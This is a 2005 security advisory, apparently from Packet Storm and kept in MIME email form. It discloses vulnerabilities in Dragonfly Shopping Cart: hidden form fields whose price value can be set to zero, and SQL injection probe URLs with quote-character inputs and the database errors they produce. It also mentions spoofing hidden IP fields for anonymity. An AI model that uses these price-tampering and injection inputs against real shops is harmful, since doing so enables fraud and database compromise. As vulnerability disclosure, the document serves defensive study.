Lucene search
Diabolic CrabPACKETSTORM:38607HistoryJul 12, 2005 - 12:00 a.m.
dragonfly.txt
2005-07-1200:00:00
Diabolic Crab
packetstormsecurity.com
20
`
------=_NextPart_001_0012_01C586EF.F4564F50
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc =
or even code them. Learn more at http://www.dbtech.org
Severity: High
Title: Dragonfly Shopping Cart Multiple vulnerabilities
Date: 11/07/2005
Vendor: DragonFly Shopping Cart
Vendor Website: =
http://www.incredibleinteractive.com/Active/dc_Productsview.asp?key=3D5
Summary: Vulnerabilities exist in Dragonfly Shopping Cart that allow =
modifiying of prices along with Sql injection vulnerabilities.
Proof of Concept Exploits:
Hidden Price Value Vulnerability
You can modify these fields to modify the price of the product and thus =
be able to purchase the biggest and most expensive products for the =
cheapest possible prices, or even nothing.
/demo/dc_Categorieslist.asp
HPVV
<input type=3D"hidden" name=3D"x_DragonflyCartProductPrice" =
value=3D"15.49" size=3D"4">
/demo/dc_Categoriesview.asp
HPVV
<input type=3D"hidden" name=3D"x_DragonflyCartProductPrice" value=3D"0" =
size=3D"4">
/demo/dc_productslist.asp
HPVV
<input type=3D"hidden" name=3D"x_DragonflyCartProductPrice" value=3D"0" =
size=3D"4">
/demo/dc_productslist_Clearance.asp
HPVV
<input type=3D"hidden" name=3D"x_DragonflyCartProductPrice" value=3D"0" =
size=3D"4">
There are also many other hidden fields like ip address etc which can be =
used to make the attack "technically" more anonymous though any normal =
logging system would catch you ;).
Sql Injections
/demo/dc_Categoriesview.asp??key=3D'&RecPerPage=3D5
Microsoft JET Database Engine error '80040e07'=20
Data type mismatch in criteria expression.=20
/demo/dc_Categoriesview.asp, line 1054=20
/demo/dc_Categoriesview.asp?key=3D%26dir%26
Microsoft JET Database Engine error '80040e14'=20
Syntax error (missing operator) in query expression '[CategoryKey] =3D =
&dir&'.=20
/demo/dc_Categoriesview.asp, line 1054=20
/demo/dc_productslist_Clearance.asp
Microsoft JET Database Engine error '80040e14'=20
Syntax error in string in query expression '([ProductActive] =3D 'show' =
AND ([ProductClearancePage] =3D 'yes' AND ProductClearanceStartDate < =
#7/7/2005# AND ProductClearanceEndDate >=3D #7/7/2005#)) AND =
((([ProductName] LIKE '%1%' OR [ProductDescriptionShort] LIKE '%1%') ' =
))'.=20
/demo/dc_productslist_Clearance.asp, line 292=20
/demo/dc_productslist_Clearance.asp?cmd=3D%27
Microsoft JET Database Engine error '80040e14'=20
Syntax error in string in query expression '([ProductActive] =3D 'show' =
AND ([ProductClearancePage] =3D 'yes' AND ProductClearanceStartDate < =
#7/7/2005# AND ProductClearanceEndDate >=3D #7/7/2005#)) AND =
((([ProductName] LIKE '%1%' OR [ProductDescriptionShort] LIKE '%1%') ' =
))'.=20
/demo/dc_productslist_Clearance.asp, line 292=20
/demo/ratings.asp??PID=3D'
Microsoft JET Database Engine error '80040e14'=20
Syntax error (missing operator) in query expression '[ProductKey]=3D''.=20
/demo/ratings.asp, line 68=20
/demo/dc_Productsview.asp
Microsoft JET Database Engine error '80040e07'=20
Data type mismatch in criteria expression.=20
/demo/dc_Productsview.asp, line 931=20
/demo/dc_forum_Postslist.asp?start=3D'
Microsoft VBScript runtime error '800a000d'=20
Type mismatch: 'nTotalRecs'=20
/demo/dc_forum_Postslist.asp, line 319=20
/demo/dc_forum_Postslist.asp?key_m=3D'
Microsoft JET Database Engine error '80040e07'=20
Data type mismatch in criteria expression.=20
/demo/dc_forum_Postslist.asp, line 200=20
/demo/dc_forum_Postslist.asp?psearch=3D1&Submit=3DSearch%20%28%2A%29&psea=
rchtype=3D'
Microsoft JET Database Engine error '80040e07'=20
Data type mismatch in criteria expression.=20
/demo/dc_forum_Postslist.asp, line 200=20
/demo/dc_forum_Postslist.asp?psearch=3D'&Submit=3DSearch%20%28%2A%29&psea=
rchtype=3D1
Microsoft JET Database Engine error '80040e07'=20
Data type mismatch in criteria expression.=20
/demo/dc_forum_Postslist.asp, line 200=20
Author:
These vulnerabilties have been found and released by Diabolic Crab, =
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =
contact me regarding these vulnerabilities. You can find me at, =
http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. =
Lookout for my soon to come out book on Secure coding with php.
-------------------------------------------------------------------------=
-------
=20
Sincerely,=20
Diabolic Crab=20
------=_NextPart_001_0012_01C586EF.F4564F50
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2668" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR><A=20
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=
.org/~dcrab</A><BR><A=20
href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><=
/FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Get Dcrab's Services to audit your Web =
servers,=20
scripts, networks, etc or even code them. Learn more at <A=20
href=3D"http://www.dbtech.org">http://www.dbtech.org</A></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: Dragonfly =
Shopping Cart=20
Multiple vulnerabilities<BR>Date: 11/07/2005</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Vendor: DragonFly Shopping =
Cart<BR>Vendor Website:=20
<A=20
href=3D"http://www.incredibleinteractive.com/Active/dc_Productsview.asp?k=
ey=3D5">http://www.incredibleinteractive.com/Active/dc_Productsview.asp?k=
ey=3D5</A><BR>Summary:=20
Vulnerabilities exist in Dragonfly Shopping Cart that allow modifiying =
of prices=20
along with Sql injection vulnerabilities.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Proof of Concept Exploits:</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Hidden Price Value Vulnerability<BR>You =
can modify=20
these fields to modify the price of the product and thus be able to =
purchase the=20
biggest and most expensive products for the cheapest possible prices, or =
even=20
nothing.<BR>/demo/dc_Categorieslist.asp<BR>HPVV</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><input type=3D"hidden"=20
name=3D"x_DragonflyCartProductPrice" value=3D"15.49" =
size=3D"4"></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial =
size=3D2>/demo/dc_Categoriesview.asp<BR>HPVV</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><input type=3D"hidden"=20
name=3D"x_DragonflyCartProductPrice" value=3D"0" =
size=3D"4"></FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial =
size=3D2>/demo/dc_productslist.asp<BR>HPVV</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><input type=3D"hidden"=20
name=3D"x_DragonflyCartProductPrice" value=3D"0" =
size=3D"4"></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial=20
size=3D2>/demo/dc_productslist_Clearance.asp<BR>HPVV</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><input type=3D"hidden"=20
name=3D"x_DragonflyCartProductPrice" value=3D"0" =
size=3D"4"></FONT></DIV>
<DIV> </DIV><FONT face=3DArial size=3D2>
<DIV><BR>There are also many other hidden fields like ip address etc =
which can=20
be used to make the attack "technically" more anonymous though any =
normal=20
logging system would catch you ;).</DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV>Sql Injections</DIV>
<DIV> </DIV>
<DIV>/demo/dc_Categoriesview.asp??key=3D'&RecPerPage=3D5</DIV>
<DIV> </DIV>
<DIV>Microsoft JET Database Engine error '80040e07' </DIV>
<DIV> </DIV>
<DIV>Data type mismatch in criteria expression. </DIV>
<DIV> </DIV>
<DIV>/demo/dc_Categoriesview.asp, line 1054 </DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV>/demo/dc_Categoriesview.asp?key=3D%26dir%26<BR>Microsoft JET =
Database Engine=20
error '80040e14' </DIV>
<DIV> </DIV>
<DIV>Syntax error (missing operator) in query expression '[CategoryKey] =
=3D=20
&dir&'. </DIV>
<DIV> </DIV>
<DIV>/demo/dc_Categoriesview.asp, line 1054 </DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV>/demo/dc_productslist_Clearance.asp</DIV>
<DIV> </DIV>
<DIV>Microsoft JET Database Engine error '80040e14' </DIV>
<DIV> </DIV>
<DIV>Syntax error in string in query expression '([ProductActive] =3D =
'show' AND=20
([ProductClearancePage] =3D 'yes' AND ProductClearanceStartDate < =
#7/7/2005#=20
AND ProductClearanceEndDate >=3D #7/7/2005#)) AND ((([ProductName] =
LIKE '%1%'=20
OR [ProductDescriptionShort] LIKE '%1%') ' ))'. </DIV>
<DIV> </DIV>
<DIV>/demo/dc_productslist_Clearance.asp, line 292 </DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV>/demo/dc_productslist_Clearance.asp?cmd=3D%27</DIV>
<DIV> </DIV>
<DIV>Microsoft JET Database Engine error '80040e14' </DIV>
<DIV> </DIV>
<DIV>Syntax error in string in query expression '([ProductActive] =3D =
'show' AND=20
([ProductClearancePage] =3D 'yes' AND ProductClearanceStartDate < =
#7/7/2005#=20
AND ProductClearanceEndDate >=3D #7/7/2005#)) AND ((([ProductName] =
LIKE '%1%'=20
OR [ProductDescriptionShort] LIKE '%1%') ' ))'. </DIV>
<DIV> </DIV>
<DIV>/demo/dc_productslist_Clearance.asp, line 292 </DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV>/demo/ratings.asp??PID=3D'</DIV>
<DIV> </DIV>
<DIV>Microsoft JET Database Engine error '80040e14' </DIV>
<DIV> </DIV>
<DIV>Syntax error (missing operator) in query expression =
'[ProductKey]=3D''.=20
</DIV>
<DIV> </DIV>
<DIV>/demo/ratings.asp, line 68 </DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV>/demo/dc_Productsview.asp</DIV>
<DIV> </DIV>
<DIV>Microsoft JET Database Engine error '80040e07' </DIV>
<DIV> </DIV>
<DIV>Data type mismatch in criteria expression. </DIV>
<DIV> </DIV>
<DIV>/demo/dc_Productsview.asp, line 931 </DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV>/demo/dc_forum_Postslist.asp?start=3D'</DIV>
<DIV> </DIV>
<DIV>Microsoft VBScript runtime error '800a000d' </DIV>
<DIV> </DIV>
<DIV>Type mismatch: 'nTotalRecs' </DIV>
<DIV> </DIV>
<DIV>/demo/dc_forum_Postslist.asp, line 319 </DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV>/demo/dc_forum_Postslist.asp?key_m=3D'</DIV>
<DIV> </DIV>
<DIV>Microsoft JET Database Engine error '80040e07' </DIV>
<DIV> </DIV>
<DIV>Data type mismatch in criteria expression. </DIV>
<DIV> </DIV>
<DIV>/demo/dc_forum_Postslist.asp, line 200 </DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV>/demo/dc_forum_Postslist.asp?psearch=3D1&Submit=3DSearch%20%28%2=
A%29&psearchtype=3D'</DIV>
<DIV> </DIV>
<DIV>Microsoft JET Database Engine error '80040e07' </DIV>
<DIV> </DIV>
<DIV>Data type mismatch in criteria expression. </DIV>
<DIV> </DIV>
<DIV>/demo/dc_forum_Postslist.asp, line 200 </DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV> </DIV>
<DIV>/demo/dc_forum_Postslist.asp?psearch=3D'&Submit=3DSearch%20%28%2=
A%29&psearchtype=3D1</DIV>
<DIV> </DIV>
<DIV>Microsoft JET Database Engine error '80040e07' </DIV>
<DIV> </DIV>
<DIV>Data type mismatch in criteria expression. </DIV>
<DIV> </DIV>
<DIV>/demo/dc_forum_Postslist.asp, line 200 </DIV>
<DIV> </DIV>
<DIV><BR>Author:<BR>These vulnerabilties have been found and released by =
Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, =
please feel=20
free to contact me regarding these vulnerabilities. You can find me at, =
<A=20
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =
or <A=20
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=
.org/~dcrab</A>.=20
Lookout for my soon to come out book on Secure coding with =
php.<BR></FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT><BR>
<HR>
<BR>Sincerely, <BR>Diabolic Crab <BR><IMG=20
src=3D"http://digitalparadox.org/dc.gif" border=3D0></DIV></BODY></HTML>
------=_NextPart_001_0012_01C586EF.F4564F50--
`